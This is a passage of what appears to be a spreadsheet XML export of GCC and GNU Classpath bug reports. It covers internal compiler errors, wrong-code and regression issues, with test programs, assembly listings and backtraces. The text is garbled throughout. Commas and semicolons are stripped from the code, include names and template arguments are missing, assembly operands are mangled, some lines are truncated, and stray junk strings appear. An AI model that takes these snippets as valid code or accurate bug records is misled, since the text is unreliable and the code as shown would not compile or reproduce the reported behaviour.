  # atemp_lsm.3_7 = PHI 
  # atemp_lsm.4_6 = PHI 
  # k_lsm.5_27 = PHI 
  _1 = (integer(kind=8)) i_29
  _2 = _1 + -1
  _3 = *a_17(D)[_2]
  _4 = ABS_EXPR 
  atemp_lsm.3_9 = _4 &gt; atemp_lsm.3_7 ? _3 : atemp_lsm.3_7
  atemp_lsm.4_28 = _4 &gt; atemp_lsm.3_7 ? 1 : atemp_lsm.4_6
  k_lsm.5_26 = _4 &gt; atemp_lsm.3_7 ? i_29 : k_lsm.5_27
  i_20 = i_29 + 1
  if (_16 &lt; i_20)
    goto 
  else
    goto 
Types of the vars in the converted expressions are:
  integer(kind=4) k_lsm.5
  logical(kind=4) atemp_lsm.4
  real(kind=8) atemp_lsm.3
The vectorizer is unable to vectorize the loop (unsupported pattern) so these conditionals stay in place until expand time.  The first of these corresponds to a floating-point select statement so it is fine.  But the other two perform floating-point comparisons to select between either integer or logical values and there is no such instruction for POWER.
The resulting code is (one iteration of an unrolled loop):
.L20:                                                                           
        addi 831                                                              
        extsw 1010                                                             
        extsw 38                                                               
        addi 448                                                              
.L42:                                                                           
        lfd 20(4)                                                              
        fabs 32                                                                
        fcmpu 736                                                             
        fsub 463                                                              
        fsel 5462                                                            
        ble 7.L23                                                              
        li 91                                                                  
.L23:                                                                           
        fcmpu 036                                                             
        rldicl 99032                                                         
        ble 0.L24                                                              
        mr 103                                                                 
.L24:                                                                           
We didn't use to if-convert these prior to r235436 (https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/tree-if-conv.c?r1=235436&amp;r2=235435&amp;pathrev=235436).  Using GCC 6.2 we see the following preferable code:
.L46:
        addi 10101
        addi 888
        extsw 1010
.L37:
        lfd 30(8)
        fabs 43
        fcmpu 540
        ble 5.L47
        fmr 123
        fmr 03
        mr 310
        li 41
        li 61
.L47:
The added if-conversion causes approximately 30% degradation in performance.
(I am not specifically blaming r235436 this just exposed the problem for this particular case.)</t>
  </si>
  <si>
    <t>GCC-3651</t>
  </si>
  <si>
    <t>shifting unsigned long on 64 bit machine incorrectly does sign extension</t>
  </si>
  <si>
    <t>Right shifting an unsigned long should not do a sign
extension.  This shift on an unsigned long variable works
okay but doing this shift on an expression that has
been cast to unsigned long does not.
This problem also occurs on Alpha Tru64 with gcc 2.7.2.1
and IRIX with gcc 2.8.1 in 64 bit mode.
Release:
gcc version 3.0 20010526 (prerelease)
Environment:
IA64 Turbolinux</t>
  </si>
  <si>
    <t>mark.dewing</t>
  </si>
  <si>
    <t>CLASSPATH-25851</t>
  </si>
  <si>
    <t>HttpURLConnection.getRequestProperties() returns Strings for values instead of List.</t>
  </si>
  <si>
    <t>As stated in the summary:
HttpURLConnection.getRequestProperties() returns Strings for values instead of List.
probably need to fix gnu.java.net.protocol.http.HTTPURLConnection.
Classpath is in violation of the JDK specification.</t>
  </si>
  <si>
    <t>GCC-38530</t>
  </si>
  <si>
    <t>ICE with the example for c_funloc</t>
  </si>
  <si>
    <t>I tried to compile the test given for c_funloc in http://gcc.gnu.org/onlinedocs/gfortran/C_005fFUNLOC.html#C_005fFUNLOC
and I got an ICE with trunk and 4.3.2:
funloc.f90: In function 'main':
funloc.f90:20: internal compiler error: in expand_expr_addr_expr_1 at expr.c:6836</t>
  </si>
  <si>
    <t>GCC-60878</t>
  </si>
  <si>
    <t>Explicit Specialization of Inner Template Class In A Template Class Using an Enum class in Parent Template Class as Template Argument</t>
  </si>
  <si>
    <t>The following code compiles in clang++ 3.5 (as of yesterday's unstable branch) and g++ 4.6.3. It does not compile with clang++ 2.9. It also compiles on GNU C++ (GCC) version 4.8.2 20140206 (prerelease) (x86_64-unknown-linux-gnu) but not GNU C++ (Arch Repository) version 4.8.2 (arm-none-eabi).
The compilers that do not compile the code gives an error saying:
test.cpp: In function 'int main()':
test.cpp:60:7: error: 'class Port::Pin::PinMode)1&gt;' has no member named 'set'
   pin.set()
       ^
Apparently they do choose the class template not the specialization.
Code to reproduce:
#include 
template
class Port
{
public: //Declarations
  enum class PinMode
  {
    Input = 0x0
    Output = 0x1
    Alternate = 0x2
    Analog = 0x3
  }
  template
  class Pin
  {
  }
  template
  class Pin
  {
  public: //Declarations
    enum class OutputSpeed : uint32_t
    {
      Low
      Medium
      Fast
      High
    }
    enum class PullMode : uint32_t
    {
      None = 0x0
      PullUp = 0x1
      PullDown = 0x2
    }
  public: //Methods
    void setOutputSpeed(OutputSpeed const ospeed) volatile
    void setPullMode(PullMode const ppm) volatile
    void set() volatile
    {
      reinterpret_cast volatile*&gt;(port)-&gt;m_BSRR |= static_cast(0x1) &lt;&lt;nPin
    }
    void reset() volatile
    bool getOutputState() volatile
  } //END OutputPin
public: //Registers
  uint32_t m_BSRR
} //END Port
int main()
{
  auto pin = Port::Pin::PinMode::Output&gt;()
  pin.set()
}</t>
  </si>
  <si>
    <t>fasdfasdas</t>
  </si>
  <si>
    <t>GCC-78278</t>
  </si>
  <si>
    <t>ICE in gfc_wide_memset at fortran/scanner.c:153</t>
  </si>
  <si>
    <t>Down to at least 4.8 :
$ cat z1.f90
program p
   character pointer :: x =&gt; null()
   data x /null()/
end
$ gfortran-7-20161106 z1.f90
f951: internal compiler error: Segmentation fault
0xc3a64f crash_signal
        ../../gcc/toplev.c:338
0x700690 gfc_wide_memset(unsigned int* unsigned int unsigned long)
        ../../gcc/fortran/scanner.c:153
0x67741d create_character_initializer
        ../../gcc/fortran/data.c:195
0x67741d gfc_assign_data_value(gfc_expr* gfc_expr* __mpz_struct* __mpz_struct (*) [1])
        ../../gcc/fortran/data.c:488
0x6f12a9 check_data_variable
        ../../gcc/fortran/resolve.c:15001
0x6f12a9 traverse_data_var
        ../../gcc/fortran/resolve.c:15130
0x6fbc91 resolve_data
        ../../gcc/fortran/resolve.c:15185
0x6fbc91 resolve_types
        ../../gcc/fortran/resolve.c:15939
0x6f76ac gfc_resolve(gfc_namespace*)
        ../../gcc/fortran/resolve.c:16027
0x6e1bba resolve_all_program_units
        ../../gcc/fortran/parse.c:5883
0x6e1bba gfc_parse_file()
        ../../gcc/fortran/parse.c:6130
0x725822 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:198</t>
  </si>
  <si>
    <t>GCC-54307</t>
  </si>
  <si>
    <t>[4.7 regression] increases in memory usage by some C++11 (and C++03) standard containers</t>
  </si>
  <si>
    <t>Between 4.6 and 4.7.x the memory used by a few standard containers has increased resulting in some OOM and performance issues on an amd64 application I work on.
4.7:
list size	 = 24
unordered_map size	 = 64
unordered_set size	 = 64
4.6:
list size	 = 16
unordered_map size	 = 56
unordered_set size	 = 56
comparing to VC11:
list size   = 16
unordered_map size	 = 64
unordered_set size	 = 64
compile commandline is just -std=c++0x. testcase program below:
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
using namespace std
int main(void)
{
	vector v printf(vector size\t = %d\n sizeof(v))
	array a printf(array size\t = %d\n sizeof(a))
	deque d printf(deque size\t = %d\n sizeof(d))
	forward_list f printf(forward_list size\t = %d\n sizeof(f))
	list l printf(list size\t = %d\n sizeof(l))
	queue q printf(queue size\t = %d\n sizeof(q))
	stack s printf(stack size\t = %d\n sizeof(s))
	tuple t printf(tuple size\t = %d\n sizeof(t))
	map m printf(map size\t = %d\n sizeof(m))
	set set printf(set size\t = %d\n sizeof(set))
	unordered_map um printf(unordered_map size\t = %d\n sizeof(um))
	unordered_set us printf(unordered_set size\t = %d\n sizeof(us))
	string str printf(string size\t = %d\n sizeof(string))
	return 0
}</t>
  </si>
  <si>
    <t>GCC-56267</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] unordered containers require Assignable hash function</t>
  </si>
  <si>
    <t>#include 
struct hash : std::hash
{
  hash
}
int main()
{
  std::unordered_set s{ 0 1 2 }
  auto i = s.begin(0)
  i = i
}
The standard does not require hash functions to be assignable.
We must cache the hash code unless is_copy_assignable is true I'm testing the fix.</t>
  </si>
  <si>
    <t>GCC-29633</t>
  </si>
  <si>
    <t>syntax error in do/while condition with templates reports incorrect line number</t>
  </si>
  <si>
    <t>The simplest way to explain this is with an example.  When compiling the testcase below g++ will report an error on lines 16 but it should report an error on lines 18.  If you change just about anything about this example it will report the correct line number (e.g. using non-template classes for either class changing the pointer type to Class1 removing tc_a &amp;&amp; from the condition).  So there's some interaction between a template member function referencing the name/pointer of a templated class in a logic expression in a do/while loop that is causing the wrong line number to be reported.  It's definitely an obscure situation but it left me scratching my head for a while trying to figure out why my code wouldn't compile.
template 
struct Class1
{
  void testfn1(void)
}
template 
class Class2
{
public:
  void testfn2(void)
  {
    Class1 * tc_a
    do
    {
      int x = 0 //line 16
    }
    while (tc_a  //line 18
  }
}
int main(void)
{
  Class2 tc2
  tc2.testfn2()
  return 0
}</t>
  </si>
  <si>
    <t>ceckak</t>
  </si>
  <si>
    <t>GCC-63956</t>
  </si>
  <si>
    <t>[5 Regression][UBSAN] ICE segfault in cxx_eval_call_expression ../../gcc/cp/constexpr.c</t>
  </si>
  <si>
    <t>Created attachment 34035
Test case (scan16.ii)
That's a new regression. It was working when I reduce PR63813 (i.e. on 2014-11-11) as that ICE came later. It now ICEs with todays GCC (r217759).
g++ -S -std=c++11 -fsanitize=undefined scan16.ii
scan16.ii:51:28:   in constexpr expansion of â€˜std::validator.std::unique_ptr::unique_ptr()â€™
scan16.ii:51:28: internal compiler error: Segmentation fault
   unique_ptr  validator
                            ^
0xcba72f crash_signal
        ../../gcc/toplev.c:359
0x81ea9a cxx_eval_call_expression
        ../../gcc/cp/constexpr.c:1147
0x820b1c cxx_eval_constant_expression
        ../../gcc/cp/constexpr.c:2864</t>
  </si>
  <si>
    <t>GCC-42137</t>
  </si>
  <si>
    <t>[4.5 Regression] error: expected constructor destructor or type conversion before â€˜{â€™ token</t>
  </si>
  <si>
    <t>error: expected constructor destructor or type conversion before â€˜{â€™ token
when compiling attached file from ppl sources with gcc 4.5.0 rev 154407</t>
  </si>
  <si>
    <t>denis.onischenko</t>
  </si>
  <si>
    <t>GCC-82805</t>
  </si>
  <si>
    <t>[7/8/9 Regression] SPEC CPU2006 454.calculix ~6% performance deviation in between 6.3 and 7.2</t>
  </si>
  <si>
    <t>We lost about 6% on Zen with -O2 -mtune=generic in between these 2 releases. It's quite hard to bisect a single revision.</t>
  </si>
  <si>
    <t>GCC-32357</t>
  </si>
  <si>
    <t>MVBITS gives wrong-code on big-endian with -fdefault-integer-8</t>
  </si>
  <si>
    <t>When I compile and run the program listed below under the mips version of gfortran with -fdefault-integer-8 it prints i = 0. It should print i = 1.
PROGRAM test
i = 0
CALL MVBITS(1 0 16 i 0)
WRITE(* 10) i
10 FORMAT(i =i2)
END PROGRAM test</t>
  </si>
  <si>
    <t>GCC-42045</t>
  </si>
  <si>
    <t>[F03] passing a procedure pointer component to a procedure pointer dummy</t>
  </si>
  <si>
    <t>The following was reported by John McFarland:
PROGRAM prog
 TYPE object
  PROCEDURE() POINTER NOPASS :: f
 END TYPE object
 TYPE container
  TYPE (object) POINTER :: o(:)
 END TYPE container
 TYPE (container) :: c
 TYPE (object) :: o1 o2
 PROCEDURE() POINTER :: f =&gt; NULL()
 o1%f =&gt; f
 ! This works
 CALL set_func(o2f)
 ! Here the compiler says the second argument has the wrong type?
 CALL set_func(o2o1%f)
 ! Same error as above but want to make sure this case works too
 ALLOCATE( c%o(5) )
 c%o(5)%f =&gt; f
 CALL set_func(o2c%o(5)%f)
CONTAINS
 SUBROUTINE set_func(of)
  TYPE (object) :: o
  PROCEDURE() POINTER :: f
  o%f =&gt; f
 END SUBROUTINE set_func
END PROGRAM prog
This program is rejected with 
test.f90:15.18:
 CALL set_func(o2o1%f)
                  1
Error: Type mismatch in argument 'f' at (1) passed REAL(4) to UNKNOWN
test.f90:19.18:
 CALL set_func(o2c%o(5)%f)
                  1
Error: Type mismatch in argument 'f' at (1) passed REAL(4) to UNKNOWN
In contrast to what these error messages say the program seems to be valid.</t>
  </si>
  <si>
    <t>GCC-6258</t>
  </si>
  <si>
    <t>floor() may return incorrect value when optimized</t>
  </si>
  <si>
    <t>Under some circumstances the GCC optimizations triggered by -ffast-math and
-O cause the maths function floor() to return incorrect values.
The supplied test program calls the function floor() in two places with
the same input values but gets different values returned.
The gcc output is as follows:
egcc -v -save-temps -Wall -MMD -O -ffast-math -ofloor_opt floor.c -lm
Reading specs from /usr/lib/gcc-lib/i386-linux/3.0.4/specs
Configured with:
../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/u
sr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as -
-with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-in
cluded-gettext --disable-checking --enable-threads=posix --enable-java-gc=bo
ehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.0.4
 /usr/lib/gcc-lib/i386-linux/3.0.4/cpp0 -lang-c -v -MM -MF
floor.dfloor_opt -MQ
floor_opt -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=4 -D__ELF__ 
-Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=
posix -D__OPTIMIZE__ -D__FAST_MATH__ -D__STDC_HOSTED__=1 -Wall -Acpu=i386 -A
machine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ floor.c floor.i
GNU CPP version 3.0.4 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/3.0.4/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-linux/3.0.4/cc1 -fpreprocessed
floor.i -quiet -dumpbase floor.c -O -Wall -version -ffast-math -o floor.s
GNU CPP version 3.0.4 (cpplib) (i386 Linux/ELF)
GNU C version 3.0.4 (i386-linux)
 compiled by GNU C version 3.0.4.
 as -V -Qy -o floor.o floor.s
GNU assembler version 2.12.90.0.1 (i386-linux) using BFD version 2.12.90.0.1
20020307 Debian/GNU Linux
 /usr/lib/gcc-lib/i386-linux/3.0.4/collect2 -m elf_i386 -dynamic-linker
/lib/ld-linux.so.2 -ofloor_opt
/usr/lib/gcc-lib/i386-linux/3.0.4/../../../crt1.o
/usr/lib/gcc-lib/i386-linux/3.0.4/../../../crti.o
/usr/lib/gcc-lib/i386-linux/3.0.4/crtbegin.o -L/usr/lib/gcc-lib/i386-linux/3
.0.4 -L/usr/lib/gcc-lib/i386-linux/3.0.4/../../..
floor.o -lm -lgcc -lc -lgcc /usr/lib/gcc-lib/i386-linux/3.0.4/crtend.o
/usr/lib/gcc-lib/i386-linux/3.0.4/../../../crtn.o
When the test program is run (by typing ./floor_opt) it prints out the
following:
    Test failed! floor(-270.000000/90) == -4.000000
    Test worked! floor(-270.000000/90) == -3.000000
The first calculation involving floor() has returned -4.0 instead of
-3.0 which is incorrect. The second occurrence of floor() is correct.
Release:
3.0.4 (Debian testing/unstable)
Environment:
System: Linux barrie.tarantella.com 2.4.12 #8 Thu Feb 21 11:48:06 UTC 2002
i686 unknown
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with:
../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/u
sr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as -
-with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-in
cluded-gettext --disable-checking --enable-threads=posix --enable-java-gc=bo
ehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
How-To-Repeat:
Here is the .i file for the test compressed with gzip -9 and uuencode:
See attachments for floor.i.gz
Unformatted:
 To: gcc-gnats@gcc.gnu.orgdebian-gcc@lists.debian.org
 Subject: floor() may return incorrect value when optimized
 From: karl
 Reply-To: karl@tarantella.com
 Cc:
 X-send-pr-version: 3.113
 X-GNATS-Notify:</t>
  </si>
  <si>
    <t>GCC-82781</t>
  </si>
  <si>
    <t>[6 Regression] Vector extension operators return wrong result in constexpr</t>
  </si>
  <si>
    <t>The following code shows the expected behavior of the == operator on vector:
    #include
    using foo = int __attribute__ ((vector_size (16)))
    int main() {
      const foo b1 = {0 1 10 20}
      const foo b2 = {0 2 10 0}
      const foo b3 = b1 == b2
      assert (b3[0] == 0xffffffff)
      assert (b3[1] == 0x0)
      assert (b3[2] == 0xffffffff)
      assert (b3[3] == 0x0)
    }
However replacing const by constexpr breaks everything:
    using foo = int __attribute__ ((vector_size (16)))
    constexpr foo b1 = {0 1 10 20}
    constexpr foo b2 = {0 2 10 0}
    constexpr foo b3 = b1 == b2
    static_assert (b3[0] == 0xffffffff)
    static_assert (b3[1] == 0x0)
    static_assert (b3[2] == 0xffffffff)
    static_assert (b3[3] == 0x0)
When compiled with
    g++-7 -std=c++14 bug-const.cpp
gives
    bug-const.cpp:8:1: error: l'assertion statique a Ã©chouÃ©
     static_assert (b3[1] == 0x0)
     ^~~~~~~~~~~~~
    bug-const.cpp:10:1: error: l'assertion statique a Ã©chouÃ©
     static_assert (b3[3] == 0x0)
     ^~~~~~~~~~~~~
where is should pass.
Best
Florent</t>
  </si>
  <si>
    <t>florent.hivert</t>
  </si>
  <si>
    <t>GCC-44509</t>
  </si>
  <si>
    <t>[4.6 Regression] Revision 160626 breaks bootstrap on *-apple-darwin*</t>
  </si>
  <si>
    <t>Revision 160626 breaks bootstrap on *-apple-darwin9*
On x86_64-apple-darwin10.3.0 at exactly revision 160626 the failure is
...
/opt/gcc/build_w/./prev-gcc/xgcc -B/opt/gcc/build_w/./prev-gcc/ -B/opt/gcc/gcc4.6w/x86_64-apple-darwin10.3.0/bin/ -B/opt/gcc/gcc4.6w/x86_64-apple-darwin10.3.0/bin/ -B/opt/gcc/gcc4.6w/x86_64-apple-darwin10.3.0/lib/ -isystem /opt/gcc/gcc4.6w/x86_64-apple-darwin10.3.0/include -isystem /opt/gcc/gcc4.6w/x86_64-apple-darwin10.3.0/sys-include    -c   -g -O2 -gtoggle -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -DGENERATOR_FILE -I. -Ibuild -I../../work/gcc -I../../work/gcc/build -I../../work/gcc/../include -I../../work/gcc/../libcpp/include -I/sw64/include  -I../../work/gcc/../libdecnumber -I../../work/gcc/../libdecnumber/dpd -I../libdecnumber  -I/sw64/include -DCLOOG_PPL_BACKEND   -I/sw64/include \
		-o build/genemit.o ../../work/gcc/genemit.c
In file included from /usr/include/math.h:28:0
                 from ../../work/gcc/genautomata.c:117:
/usr/include/architecture/i386/math.h: In function '__inline_isnormalf':
/usr/include/architecture/i386/math.h:191:163: error: invalid operands to binary &gt;= (have 'float' and 'double_int')
/usr/include/architecture/i386/math.h: In function '__inline_isnormald':
/usr/include/architecture/i386/math.h:192:163: error: invalid operands to binary &gt;= (have 'double' and 'double_int')
/usr/include/architecture/i386/math.h: In function '__inline_isnormal':
/usr/include/architecture/i386/math.h:193:2: internal compiler error: Segmentation fault
...
However at revision 160635 (tried before) the failure is:
...
/opt/gcc/build_w/./prev-gcc/xgcc -B/opt/gcc/build_w/./prev-gcc/ -B/opt/gcc/gcc4.6w/x86_64-apple-darwin10.3.0/bin/ -B/opt/gcc/gcc4.6w/x86_64-apple-darwin10.3.0/bin/ -B/opt/gcc/gcc4.6w/x86_64-apple-darwin10.3.0/lib/ -isystem /opt/gcc/gcc4.6w/x86_64-apple-darwin10.3.0/include -isystem /opt/gcc/gcc4.6w/x86_64-apple-darwin10.3.0/sys-include    -c   -g -O2 -gtoggle -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -DGENERATOR_FILE -I. -Ibuild -I../../work/gcc -I../../work/gcc/build -I../../work/gcc/../include -I../../work/gcc/../libcpp/include -I/sw64/include  -I../../work/gcc/../libdecnumber -I../../work/gcc/../libdecnumber/dpd -I../libdecnumber  -I/sw64/include -DCLOOG_PPL_BACKEND   -I/sw64/include \
		-o build/genemit.o ../../work/gcc/genemit.c
In file included from /usr/include/math.h:28:0
                 from ../../work/gcc/genautomata.c:117:
/usr/include/architecture/i386/math.h: In function '__inline_isnormalf':
/usr/include/architecture/i386/math.h:191:2: internal compiler error: in lazy_hex_fp_value at c-family/c-cppbuiltin.c:987
...
as reported at http://gcc.gnu.org/ml/gcc-patches/2010-06/msg01282.html
On powerpc-apple-darwin9 at revision 160627 the failure occurs later as:
...
/opt/gcc/darwin_buildw/./prev-gcc/xgcc -B/opt/gcc/darwin_buildw/./prev-gcc/ -B/opt/gcc/gcc4.6w/powerpc-apple-darwin9/bin/ -B/opt/gcc/gcc4.6w/powerpc-apple-darwin9/bin/ -B/opt/gcc/gcc4.6w/powerpc-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.6w/powerpc-apple-darwin9/include -isystem /opt/gcc/gcc4.6w/powerpc-apple-darwin9/sys-include    -c  -DIN_GCC_FRONTEND -g -O2 -mdynamic-no-pic -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -Ijava -I../../gcc-4.6-work/gcc -I../../gcc-4.6-work/gcc/java -I../../gcc-4.6-work/gcc/../include -I../../gcc-4.6-work/gcc/../libcpp/include -I/sw/include  -I../../gcc-4.6-work/gcc/../libdecnumber -I../../gcc-4.6-work/gcc/../libdecnumber/dpd -I../libdecnumber  -I/sw/include -DCLOOG_PPL_BACKEND    ../../gcc-4.6-work/gcc/java/jcf-dump.c -o java/jcf-dump.o
In file included from /usr/include/math.h:26:0
                 from ../../gcc-4.6-work/gcc/java/jcf-dump.c:63:
/usr/include/architecture/ppc/math.h: In function '__inline_isnormalf':
/usr/include/architecture/ppc/math.h:216:3: internal compiler error: in lazy_hex_fp_value at c-family/c-cppbuiltin.c:987
...
See also http://gcc.gnu.org/ml/gcc-regression/2010-06/msg00207.html .
Note that I just finished bootstrapping x86_64-apple-darwin10 at revision 160657 with 160626 reverted.</t>
  </si>
  <si>
    <t>GCC-8131</t>
  </si>
  <si>
    <t>Union of struct of union of struct bit field</t>
  </si>
  <si>
    <t>Bit field struct don't pack bit properly(?) when they are in a Union included in a struct. I might be stupid and not know how to do that too...
Release:
gcc version 3.2(i686-linux) &amp; 3.1 Apple  20020420 (prerelease)
Environment:
powerpc-Apple-macosx (Jag 10.2.1) 
i686-lfs(4.0rc1)-linux
How-To-Repeat:
#include
typedef union 
{
    struct
    {
        union 
        {
            struct
            {
                int reserved:16
                int R:15
            }Tx
            struct
            {
                int R:15
                int PPS:1
                int I:15
            }Rx
        }value
        int TxRx:1
    }sample
    unsigned int Raw
}gumpData
typedef union 
{
    struct
    {
        union 
        {
            struct
            {
                int reserved:16
                int R:15
                int TxRx:1
            }Tx
            struct
            {
                int R:15
                int PPS:1
                int I:15
                int TxRx:1
            }Rx
        }value
    }sample
    unsigned int Raw
}gumpData2
int main(void)
{
gumpData data
gumpData2 data2
data2.sample.value.Rx.TxRx=0
data2.sample.value.Rx.I=12
data2.sample.value.Rx.R=11
data2.sample.value.Rx.PPS=0
data.sample.TxRx=0
data.sample.value.Rx.I=12
data.sample.value.Rx.R=11
data.sample.value.Rx.PPS=0
printf(Data  %x Size: %d\ndata.Rawsizeof(data))
printf(Data2 %x Size: %d\ndata2.Rawsizeof(data2))
return(0)
}
$ gcc test.c
$ ./a.out
Data  800c000b Size: 8
Data2 c000b Size: 4</t>
  </si>
  <si>
    <t>ptrottier</t>
  </si>
  <si>
    <t>GCC-35023</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with parameter pack in variable declaration</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on mainline since today:
=============================================================
template int foo()
{
  T t
  return t
}
void bar()
{
  foo()
}
=============================================================
bug.cc: In function 'int foo()':
bug.cc:3: error: parameter packs not expanded with `...':
bug.cc:3: note:         'T'
bug.cc: In function 'int foo() [with T = int]':
bug.cc:9:   instantiated from here
bug.cc:4: internal compiler error: tree check: expected record_type or union_type or qual_union_type have template_type_parm in lookup_conversions at cp/search.c:2444
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-68843</t>
  </si>
  <si>
    <t>ICE with u input constraint</t>
  </si>
  <si>
    <t>Hi
I have just played a bit with 80x87 fpu register constraints and found an ICE:
cat t1.c
double test()
{
  double xy
  asm (# %0 %1 %2 : =
  return x
}
gcc -O -S t1.c
t1.c: In function 'test':
t1.c:6:1: internal compiler error: in change_stack at reg-stack.c:2522
 }
 ^
0xa934a3 change_stack
	../../gcc-trunk/gcc/reg-stack.c:2522
0xa93b62 subst_asm_stack_regs
	../../gcc-trunk/gcc/reg-stack.c:2125
0xa95ead subst_stack_regs
	../../gcc-trunk/gcc/reg-stack.c:2302
0xa960ed convert_regs_1
	../../gcc-trunk/gcc/reg-stack.c:2951
0xa960ed convert_regs_2
	../../gcc-trunk/gcc/reg-stack.c:3086
0xa96f5a convert_regs
	../../gcc-trunk/gcc/reg-stack.c:3121
0xa96f5a reg_to_stack
	../../gcc-trunk/gcc/reg-stack.c:3250
0xa96f5a rest_of_handle_stack_regs
	../../gcc-trunk/gcc/reg-stack.c:3305
0xa96f5a execute
	../../gcc-trunk/gcc/reg-stack.c:3336
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
and same result for:
cat t2.c
double test()
{
  double xy
  asm (# %0 %1 %2 : =
  return x
}</t>
  </si>
  <si>
    <t>GCC-12279</t>
  </si>
  <si>
    <t>VAX casesi causes ICE</t>
  </si>
  <si>
    <t>typedef long unsigned int size_t
int snprintf (char * __restrict size_t const char * __restrict ...)
     __attribute__((__format__(__printf__ 3 4)))
int
outfmt(char *obuf size_t len char fmt double b)
{
    switch (fmt) {
 case 'G':
     return snprintf(obuf len %.2f GB b / 1024.0 / 1024.0 / 1024.0)
     break
 default:
 case 'K':
     return snprintf(obuf len %.2f KB b / 1024.0)
     break
 case 'M':
     return snprintf(obuf len %.2f MB b / 1024.0 / 1024.0)
     break
 case 'g':
     return snprintf(obuf len %.2f Gbit b * 8.0 / 1024.0 / 1024.0 / 1024.0)
     break
 case 'k':
     return snprintf(obuf len %.2f Kbit b * 8.0 / 1024.0)
     break
 case 'm':
     return snprintf(obuf len %.2f Mbit b * 8.0 / 1024.0 / 1024.0)
     break
    }
}
Compiling that via:
./xgcc -S -O2 -B./ -v -c /tmp/x.i 
Reading specs from ./specs
Configured with: '/u2/toolchain/gcc/configure' '--target=vax--netbsdelf : (reconfigured) '/u2/
toolchain/gcc/configure' '--target=vax--netbsdelf '--disable-multilib
Thread model: single
gcc version 3.4 20030913 (experimental)
 ./cc1 -fpreprocessed /tmp/x.i -quiet -dumpbase x.i -auxbase x -O2 -version -o x.s
GNU C version 3.4 20030913 (experimental) (vax--netbsdelf)
        compiled by GNU C version 2.95.3 20010315 (release) (NetBSD nb4).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
/tmp/x.i: In function `outfmt':
/tmp/x.i:29: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
#0  0x837f348 in label_is_jump_target_p (label=0x484fe5f0 
    jump_insn=0x48574580) at /u2/toolchain/gcc/gcc/cfgcleanup.c:665
#1  0x838107c in try_optimize_cfg (mode=256)
    at /u2/toolchain/gcc/gcc/cfgcleanup.c:1715
#2  0x838157c in cleanup_cfg (mode=256)
    at /u2/toolchain/gcc/gcc/cfgcleanup.c:1915
#3  0x8124587 in cfg_layout_initialize ()
    at /u2/toolchain/gcc/gcc/cfglayout.c:1128
#4  0x8378131 in reorder_basic_blocks ()
    at /u2/toolchain/gcc/gcc/bb-reorder.c:1067
#5  0x8324c6b in rest_of_handle_reorder_blocks (decl=0x48573870 
    insns=0x484fb440) at /u2/toolchain/gcc/gcc/toplev.c:2280
#6  0x83270ff in rest_of_compilation (decl=0x48573870)
    at /u2/toolchain/gcc/gcc/toplev.c:3481
#7  0x83717c3 in tree_rest_of_compilation (fndecl=0x48573870 
    nested_p=0 '\000') at /u2/toolchain/gcc/gcc/tree-optimize.c:165
#8  0x807cbf3 in c_expand_body_1 (fndecl=0x48573870 nested_p=0)
    at /u2/toolchain/gcc/gcc/c-decl.c:6190
#9  0x807cdf8 in c_expand_body (fndecl=0x48573870)
    at /u2/toolchain/gcc/gcc/c-decl.c:6220
#10 0x8373fa5 in cgraph_expand_function (node=0x48577360)
    at /u2/toolchain/gcc/gcc/cgraphunit.c:481
#11 0x8375c0b in cgraph_expand_functions ()
    at /u2/toolchain/gcc/gcc/cgraphunit.c:1224
#12 0x8375e20 in cgraph_optimize () at /u2/toolchain/gcc/gcc/cgraphunit.c:1288
#13 0x80e495b in c_objc_common_finish_file ()
    at /u2/toolchain/gcc/gcc/c-objc-common.c:249
#14 0x8056bb3 in finish_file () at /u2/toolchain/gcc/gcc/c-lang.c:231
#15 0x80d5ab6 in c_common_parse_file (set_yydebug=0)
    at /u2/toolchain/gcc/gcc/c-opts.c:1216
#16 0x8323ebb in compile_file () at /u2/toolchain/gcc/gcc/toplev.c:1792
#17 0x83289e0 in do_compile () at /u2/toolchain/gcc/gcc/toplev.c:4484
